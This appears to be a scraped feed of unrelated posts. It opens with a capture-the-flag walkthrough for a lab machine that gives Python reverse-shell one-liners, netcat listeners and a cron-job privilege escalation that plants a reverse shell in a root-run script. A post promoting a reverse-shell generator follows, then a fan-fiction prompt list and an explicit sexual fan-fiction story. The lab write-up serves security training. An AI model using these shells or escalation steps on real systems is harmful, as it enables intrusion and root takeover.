(from target’s shell) INPUT: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
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(from attacker’s terminal) INPUT: netcat -nlvkp 1234
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We’re connected. Next, upgrade to a tty shell.
INPUT: python -c 'import pty; pty.spawn("/bin/bash")'
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User flag Now that we have our own shell, let’s search for the user flag. After searching through the home/arrexel/ directory, we find our user.txt and open it to find the flag .
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Recon The last step is escalating our privilege to root. But before doing so, we’ll need more information about the server. We can check for any security misconfigurations like: - finding sudo permissions to run commands for any other users besides root - look up any files configured to setuid permissions - enumerate system services and kernel information - enumerate user information (checking /etc/passwd or /etc/shadow files), etc.
During this process we’ll notice the following information. Our current user can run any commands as the script manager without a password.
INPUT: sudo -l
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Additionally, after checking the directories and files, I notice that there is a directory called “scripts”, where the user scriptmanager has read/write/execute permissions. When we initially try to view this directory as www-data, we will get a permission denied.
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User, scriptmanager To view the scripts directory, let’s switch to the user, scriptmanager. As scriptmanager, we should be able to view the scripts directory.
INPUT: sudo -u scriptmanager /bin/bash
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When we view the test.py file, we’ll notice something interesting. The script of the test.py file, opens and writes to the test.txt file.
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Furthermore, when we ls -lh the test.txt file, we’ll notice that the file’s timestamp is fairly recent.
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If our theory is correct, the test.txt is running a cron job from  the test.py file, which means we should be able to edit the test.py file, and run it as the root user.
Hence, we’ll edit the test.py file and include another reverse shell; only this time, since the cron job is referring the test.txt file as root, we should be able to listen in and receive a root shell.
(from target’s shell) INPUT: echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4321));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
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(from kali terminal) INPUT: netcat -nlvkp 4321
And… we are ROOT!
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Find root flag Finally, search for the root flag; this will be found in /root/root.txt
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hackgit · 3 years
​Shelly Automatic Reverse Shell Generator. Available Languages: 1. Bash 2. Netcat 3....
​Shelly Automatic Reverse Shell Generator. Available Languages: 1. Bash 2. Netcat 3. PHP 4. Ncat 5. Python 6. Python3 7. Perl 8. Telnet 9. PowerShell 10. Awk 11. Socat 12. Ruby 13. Xterm 14. Gawk https://github.com/d4t4s3c/Shelly
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maroucia · 3 years
Sansan Russian Roulette, summer 2021: the fills!
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Here’s all the fills with links for the SanSan Russian Roulette 2021. Thanks everyone for your participation! 😄
Links under the cut!
1. Meet Me In The Moonlight Author: Fleurdeplume: “Dusk. Secret meetings. Stolen kiss. Sansa looks like a little bird but deep down, she's a wolf.” (Prompt from Lysae).
2. Broken Like Me Author: TheImmaculateBastard: “Inspired by a tweet, "I don't know what just happened, but I was at an animal shelter before work and a toddler walked in, pointed to me, and said “I want that one”. His mother looked at me and said “you can’t have that, that’s a grown man”” (Prompt from Lorel).
3. The Eyes Have It Author: Jadedelcinismo: “Sansa is in love with Sandor and is jealous of someone in his life. Canon/AU, your choice.” (Prompt from Missy-1978).
4. A Long Time Coming Author: Vermilion_Sunrise: “Sandor tucks Sansa in bed after her first day as Queen in the North.” (Prompt from Prettybadmagic).
5. Russian Roulette Author: Meganfence: “Fight, argument or other disagreement. Open to interpretation, minor or major.” (Prompt from Redbirdblackdog).
6. One Picture Author: Sharkaria: “Sandor discovers he's got a good eye for photography. He fills his time taking pictures of his urban landscape, until he spies a Little Bird Muse...” (Prompt from Glamgrowl).
7. The Season Author: Missy-1978: “Kinda stole this from the Discord, but I love a forced marriage trope! Maybe Sansa got left at the altar and Sandor steps in last minute. Or a role reversal where she has to marry him to save his honor. Something fun and unexpected, can be modern or set in GOT world.” (Prompt from Atomic-bomb-shell).
8. 𝓨𝓸𝓾 𝓐𝓻𝓮 𝓒𝓸𝓻𝓭𝓲𝓪𝓵𝓵𝔂 𝓘𝓷𝓿𝓲𝓽𝓮𝓭... Author: TailBobSquid: “Jumanji AU - either a game that they are playing comes to life or they get sucked into a game that they are playing.” (Prompt from ReadyReaderOne).
9. Magic Act! Author: Prettybadmagic: “Sandor is going to do it. He's going to do the kiss your best friend challenge. The friend he just happens to have been in love with since day one.” (Prompt from Islandida).
10. You should meet my Sister Author: Glamgrowl: “Feel good and funny modern au where all Starks are alive and well. Sansa makes the first move on Sandor even though she's not sure she's his type as he is much older and works a blue collar job. (Please no Joffrey bashing) Cameos from other Starks would be awesome but not necessary.” (Prompt from Rayne).
11. better days (just around the corner) Author: Glitterswitch: “Bakery/coffee shop AU Stranger is Sandor’s service animal.” (Prompt from OrangeTabby).
12. A Thin Line Author: LittleWolfBird: “Sandor joins the Stark family traveling circus when he sees a casting call for "freaks." Bonus points for Sansa on trapeze or tightrope.” (Prompt from GlitterGoth114).
13. Feels Like Spring Author: Diverse.lorde: “Sansa playing her high harp (or other instrument) and singing a song that she wrote about/for Sandor.” (Prompt from Neleam).
14. Going Viral Author: Lysae: “Sandor finds out Sansa made him TikTok famous after a video of him goes viral: Sansa: hey can I have x/can we go to y? Sandor: no. Sansa, in a sweet voice: pretty please? Sandor, huffing: fine (Daddy on the end of pretty please would be lovely, but if Daddy Sandor isn’t your thing, no problem).” (Prompt from TailBobSquid).
15. The Package Author: OrangeTabby: “Mafia AU, fancy party. Dominant Sandor, thirsty Sansa Sandor in a suit, hand tattoos, creeping neck tattoo, whiskey - Sansa thirsting.” (Prompt from Meganfence).
16. I Wonder That Too, Ser Chirrup Author: Neleam: “Sanson Stark has always been the dutiful yet idealist second son of House Stark. Sandra Clegane is a Silent sister who has been disappointed by the very songs she once admired. A knight of the Seven and a handmaiden of the Stranger unexpectedly find comfort in each other.” (Prompt from Jadedelcinismo).
17. Good Girl Author: Redbirdblackdog: “Sansa gets her first tattoo by none other than the famous tattoo artist "The Hound". When she's in pain, she exhales slowly and Sandor says, "Good girl". Sexual tension ensues. (This prompt was inspired by a meme.)” (Prompt from Thequeen--in--thenorth).
18. Ever the Same Author: Thequeen--in--thenorth: “Following a tumultuous few years, Sansa has spent every penny she's ever earned on a quiet cottage, surrounded by forest and wildlife. Not long after moving, a strange man appears in the pond near her home, half-alive and unable to remember anything about himself except his name: Sandor.” (Prompt from Suzi).
19. Closure's Overrated Author: Atomic-bomb-shell: “Crust punk modern AU. Sandor is a crustie squatting in the backyard of an abandoned house. Sansa is a friendly neighbor who offers him a warm meal and access to her laundry room.” (Prompt from Diverse.lorde).
20. All Because of a Little Bird Author: Lorel: “Sansa manages a gallery in King’s Landing. After storming out of a fight with her boyfriend, she drives off into the countryside. That’s when she sees the most amazing art behind some dusty glass in a car repair shop. Now all she has to do is convince the artist, Sandor, to do a show at her gallery.” (Prompt from Vermilion_Sunrise).
21. Caught Author: GlitterGoth114: “Walked in on. Caught in the act. "Can opened, worms everywhere." (Prompt from TheImmaculateBastard).
22. Unanswered Author: Islandida: “Robb comes home from war with a big loyal man behind him. Sansa never thought she'd see her brother again let alone *him*. Modern au or canon.’’ (Prompt from LittleWolfBird).
23. Hajime (To Begin) Author: Rayne: “Modern AU: After finally getting out of an unhappy/controlling relationship with Joffrey that desecrated her self-worth, Sansa enrolls for self-defence classes with martial arts Master Clegane, who proceeds to build up her self esteem and fighting skills while the two fight their mutual attraction.” (Prompt from Fleurdeplume).
24. Thig crìoch air an t-saoghal, ach mairidh gaol Author: Suzi: “Prompt submission -- passionate time travel.” (Prompt from Sharkaria).
25. His flame Author: ReadyReaderOne: “Sansa leaves with the Hound that night. Their journey thru Westeros is loosely similar - Arya, Twins, etc. They find Elder Brother to help Sandor. After healing, all 3 head for Braavos, and the Dragon Queen. Lots of friendship/bonding b/t all 3; both defend Sandor from Dany. Devoted sansan, HEA!’’ (Prompt from Glitterswitch).
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utterlyhopeful-fics · 4 years
Angel Reyes x Reader
Word Count: 1705k
Language: Smut, mention of blow-job, language, SMUT
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Y/N leaned dangerously lower finding herself eye level with none other than Angel and the guys. She smirked; “You have five minutes to meet me in the storage closet Angel Reyes or I’m starting without you.” Y/N whispered licking the shell of his ear seductively. “And I don’t like waiting…” 
Her converse shoes squeaked ever so slightly against the wood floors beneath them as he ogled her ass swaying farther from his reach. Her form fitting shirt was leaving little to his active imagination. Her denim cutoffs taunted him with the simple sway of her luscious hips. She was a fucking deity and Y/N knew he was eating out of the palm of her enticing hand.
Under his breath, Angel finally exhaled the compressed air lodged in his chest; “Fuck.” Popping the ‘k’ overtly. It wasn’t until Coco coughed attempting to clear away any residual sexual tension that Angel peeled his stare from Y/N looking around the table innocently.
“Yo, I say this with mad love but if you don’t leave this table to fuck her, I will homie.” Gilly and Riz laughed wholeheartedly alongside Coco. The fire in Angel’s orbs blared to life, anger gripping ahold of him. His fist clenched ripping one of his cards clean down the middle trying to refocus his pent-up frustration.
“I’d watch that mouth of yours, man. Anyone who dares to touch Y/N nonetheless solicit my girl will definitely be meeting me in the fucking ring. Got it, hermano?”
Coco cheeks blushingly glowed chuckling at his best friend. They were in the middle of a poker game and Y/N knew to not bother him during these times. But, looks like Y/N didn’t want to play fair tonight and he’d have to remind of the rules. Angel licked his wet lips as saliva pooled within him.  
“I only do it because you’re so easy to get a reaction out of…probably why Y/N loves seeing that pissed look on your face. Bitch knows how to play the damn game; I’ll give her that.”
He threw his cards down to the table signaling his defeat; “Boys, I gotta girl that needs tendin to. Don’t come searching for us.” Angel raised his left eyebrow wiggling it to the best of his ability. His boots scuttled as the chair legs screeched backwards. Angel leisurely rose from his seat chugging the rest of his whiskey. The liquor was bitter, malty, and burned in all the right places. With his nerves afire and his belly ablaze, Angel sought out the one thing that could calm and simultaneously bait him.
The rumblings of his brothers didn’t jog past him as he walked towards the empty storage room. The soft voice of Gilly made its way to him; “Fucking Reyes and Y/N. How the hell did he score her again?” Coco chimed in; “Cabrón con suerte.”
Ez watched from the bar top inspecting his brother’s hungry glare scouring the room for Y/N. To say he was jealous wouldn’t be his choice of words but there was something about his best friend and brother boning that provided a weird energy of comfort.  
“Avert your gaze, Prospect. That’s an order.” Angel raised his hand saluting him breaking into a fit of laughter. Ez merely nodded focusing his attention back to demeaning cleaning chores and collecting miscellaneous bottles. The older Reyes walked through the door in search of the hidden room approaching on his left. He so enjoyed these games especially when it included Y/N.
“Oh sweetheart, where ya hiding? Papi is getting impatient.” His questioning tone vibrated off the bare walls as Angel observed the nooks and crannies surrounding him.
“Querida, you’re being a damn tease…”
Out of the blue, Angel heard the teasing tone of his girlfriend; “Marco….”
“So, you want to play games, Y/N? Bring it on darling. Polo.”
His ears perked up as his arm hairs stood straight looking for identifiable clues. Angel whipped around hearing a broom clash against the cold concrete. Y/N shuffled covering her mouth in hopes of keeping her laughs muffled. Her heart was practically beating outside of her rib cage as his signature cologne invaded her nostrils. Ever so quietly, Angel instinctively sauntered obscenely silent towards a corner of the abandoned room.
Angel was swift on his feet jumping around the corner scaring the living shit out of Y/N; “Gotcha!”
Y/N jumped as Angel watched her eyes bulge in momentary fear; “Shit, Angel! Well, looks like you found me. Now time to claim your prize?”
“Don’t have to tell me twice, baby.” Angel’s grip on her smooth hips tightened gluing her between the wall and his frame. Y/N huffed pressing her breasts firmly against him in retaliation.
“Well now that I’ve got you exactly where I want you…what are you gonna do with me?” Angel nipped at her exposed cleavage moaning loudly.
“Jesus Angel. You’re driving me crazy.” With little vigor, Y/N’s hands shoved him giving her a sliver of distance. Grabbing by the collar of his pristine shirt, she pressed him into her former place. Immediately, Y/N reached for the bulky belt buckle currently blockading her path, pulling hard admiring it slipped through the loops. She kept one hand securely on his chest as the other dropped the offensive item to the ground.
“You’ve been very naughty Angel. I’m here to deliver your penance.” Her flirtatious manner was beginning to get the best of her, her patience was truly being tested. She sunk down to her knees staring up at his bashful brown eyes and quivering Adam’s apple. Contemplating every sinful thought riddling his thoughts Angel tried to find the words garbled in his throat. 
Her hands moved faster than his brain undoing the button of his jeans before Angel was graced with the delicious sound of a zipper lowering. A minor tug of his pants revealed his striped boxers as Y/N slipped beneath the pesky layer. Her doe eyes gawked towards him in a demanding yet submissive approach.
“Looks like you’re in for a treat, Reyes…Of course if you’re not interested, I bet I could find---”
“No more fucking around baby.” Y/N bobbed in innocent agreement; “As you wish.”
She enveloped his hard cock stroking him the entire length, squeezing just enough at the tip as a groan slipped from him. “I can’t wait to taste you. I’ve missed you.”
Y/N continued her perfected movements fondling his dick faster causing his breath to hitch.
“Damnit, baby! What’re you doin—?”
Before he could finish his sentence, Angel was engulfed in her heat, the warmth of her flawless mouth. Y/N sucked harder compelling Angel’s head knocking the white wall holding him.
“You are too good at that. Too fucking good.”
Drool oozed from the corner of her salacious mouth as Y/N hummed forcing the vibrations to take Angel to the next level of pleasure. She sucked him off like her life depended on it. He was a half second away from losing it when she deep throated him to her limit. The suction noise was enough to turn him on enormously, but watching his girl go full force was about to make him lose his load. Pre-cum leaked down her chin before Y/N made quick work of licking it away, tidying up her mess.
She proceeded to remove herself, popping her lips loudly in effect; “Mm hmm, two minutes and you’re a goner.”
Angel was stunned into submission at the attractive girl on her knees and it turned him on to no surmountable end. He guided her back to where he craved her most cleverly placing his hand on the back of her head. He hated controlling her mannerisms but strictly stayed in place for future guidance. Angel added the smallest of pressure as more of his length guided down her throat. So warm and welcoming, Angel had to think of literally anything else to stop himself from cumming. The lustful look, her hands locked behind his buttocks, it was all too much for a simple Mayan to take in.
“Ahh, ahh shit. If you get doin that, I’m gonna explode.”
So, Y/N kicked into overdrive taking him as deep as her body would allow. She loved watching his eyes roll into the back of his head and the part of his lips waiting to cry out. So close, Y/N knew he was teetering on the edge of a mind-blowing orgasm so she initiated into full force.
The squelching noises coming from Y/N sent Angel overboard. Y/N sloppily slurped vying with every energetic thrust. The ache within him involuntarily released driving Angel to cum ferociously into Y/N’s sweet, hot mouth. Ribbons of cum filtrated the back of her throat welcomingly.
‘Fuck, fuck, fuck, fuck’ was the only explicit word in Angel’s mind as lustful chaos stormed throughout his body. Hot cum simmered down her throat as she so freely swallowed every gulp with dignified pleasure. She moaned around his length allowing his orgasm to linger. Angel lovingly held her in place as she sucked every last drop from the tip of his cock.
“God damn. God damn woman.”
Y/N’s fingers edged along the corners making sure to clean up any remnants remaining surveying Angel candidly. Y/N removed herself from the floor tucking him gently back into the folds of his boxers as his body turned to gelatin.
“You taste sweet. A hint of strawberry and pineapple?” Her devious tone enticed him wanting to bend her over and make her scream. But they’d been preoccupied for longer than anticipated. Angel knew he couldn’t fuck her quite yet but the night was young and the devilish grin on Y/N’s face told him he was in for a night of fucking and love making.
“Babe, that was fucking mind-blowing.” Angel cupped her cheeks kissing her excitedly. His cock twitched wishing to be buried inside Y/N but he knew better.
“Damnit, one hour and we’re out of here. Got it?”
“You don’t have to tell me twice, Reyes. I’m in dire need of an orgasm or two especially with my sexy as fuck Mayan to ride reverse cowgirl.”
“You have to idea what you’re askin for….”
Winking in Angel’s direction, Y/N knew precisely what she desired; “One hour or I’m starting without you.”
Tags: @twistnet​ @ifoundmyhappythought @angelreyesgirl89 @carlaangel86 @imagineredwood @gemini0410 @mayans-mc @reaperwalking @prospectfandom @emmaveale123 @peaky-marvel @kind-wolf @scorpio4dayzzz @starrynite7114 @penny4yourthot @breanime @whyisgmora @thegirlwhowritesfics @star017 @threeminutesoflife @woahitslucyylu @briannab1234 @summertimesadnesswithadashofsass @blessedboo @lady-pswrld
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